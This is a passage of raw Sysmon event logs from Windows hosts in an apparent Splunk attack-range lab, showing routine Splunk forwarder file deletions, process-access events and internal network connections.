AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51683-false10.0.1.12-8000- 23542300x8000000000000000221962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.635{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1982D328BEAC4022CBBE5C64C9DD7777,SHA256=8A20301652696D121DE748C62D895A1A284A6CEEE2F80ED54EADD6908F95EDF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1857-6216-2A05-000000003902}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1857-6216-2A05-000000003902}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1857-6216-2A05-000000003902}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:51.260{4F8D34B0-1857-6216-2A05-000000003902}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:52.758{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11CE57845E5FEFD85C4307B186722BA3,SHA256=9DBC137C58F9C96A0B542C726B7E6E175B53FCC66701855D0C654B4EB6DAA130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:52.681{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC5A8C7280A4A5D39C9F830D2EAC84EE,SHA256=DC2846582D9A0FF686DFA79C327B9BD5C8B22C9E1E53EC610B843B636482E339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:52.260{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08710CE2AB05E6B521A21BA574ECCA64,SHA256=303DFE91388AE7EED9E193FDC18E391D6A11577AC097BF45FFB95B92D3DFD17C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:53.758{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=357FCEE6D2C39C8F4440FA8E06039DA8,SHA256=D627289741BD537F3EB3ACEEE2F74C88090BC0BBA490E650DE85041148C6BB6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:53.759{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6536DC0E343EE473FF8EDBD15255B6D6,SHA256=19CB5A8473D5FA796DFBE647586AAD05DD7AD4A629A952995519CF82178D94EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:53.427{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:53.427{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:53.427{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:54.822{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2146B6115642FA9A963511B672A3939E,SHA256=2A44C754A9D7309024EADAB5177D91D681B03668CCF9385C370DEED9BC311940,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:54.774{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF8ABAA87B6F637DB1A3D569FCED615,SHA256=C5A798DA42FB98345ECC4AD5F69F0C31A5C6B7100F6A5851E919231E0DED4FC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:55.838{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7BEC5846735003FFBBFAB0F196E6A76,SHA256=75D81FBCB615C48C5A82DED20C9D7DEA6982BCF20C82A527C8E88CD91926FD3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:55.795{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F3EEA01D2C5084684EFBB1758E686C9,SHA256=4AE6615A4AF2E64E4BA1F658BCF9D0CF1B7125D864E0756DA1B1E845DCCB767F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:53.548{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49503-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:56.853{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF9172A196A36D42112A0568B4BBF43,SHA256=6705643CDF877415988F7A22D3001CE78AD882F9E77CBB386B3021A693564E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:56.811{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22827D14CBDE3A3151C36F2D5BAF5E43,SHA256=0E4BF30AA3BC56E130A6F3FE899783F3C242BBA5288A8F909273F801584244E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:57.869{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A12358D7E6C89AEF14F9DC74853FCB24,SHA256=4496AAF048239610A7C56D33B0532ED4ADACBE7B49B09C987D78908AAA4C98D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:57.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5F29169F0B58221A5DC6F61D7145FC,SHA256=BA410785931518B06533991BCC53E2E1D5941EA353B413DDEB1D0305D2F36C51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:54.619{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51684-false10.0.1.12-8000- 23542300x8000000000000000221972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:58.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB0D692BC8A0D19773732459C0AD190,SHA256=318FA3E0AEAAA9B7FF7BB12D36477910F94605FE5CBCF7BD7804687CCB4F7299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:58.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5227D065A5D8DD59D382AEBB6FF23F1C,SHA256=A9B1D9EE0F746FF74F14F2C3F52B53451F357E31AE0116B805660C356F8F2B5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:59.916{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 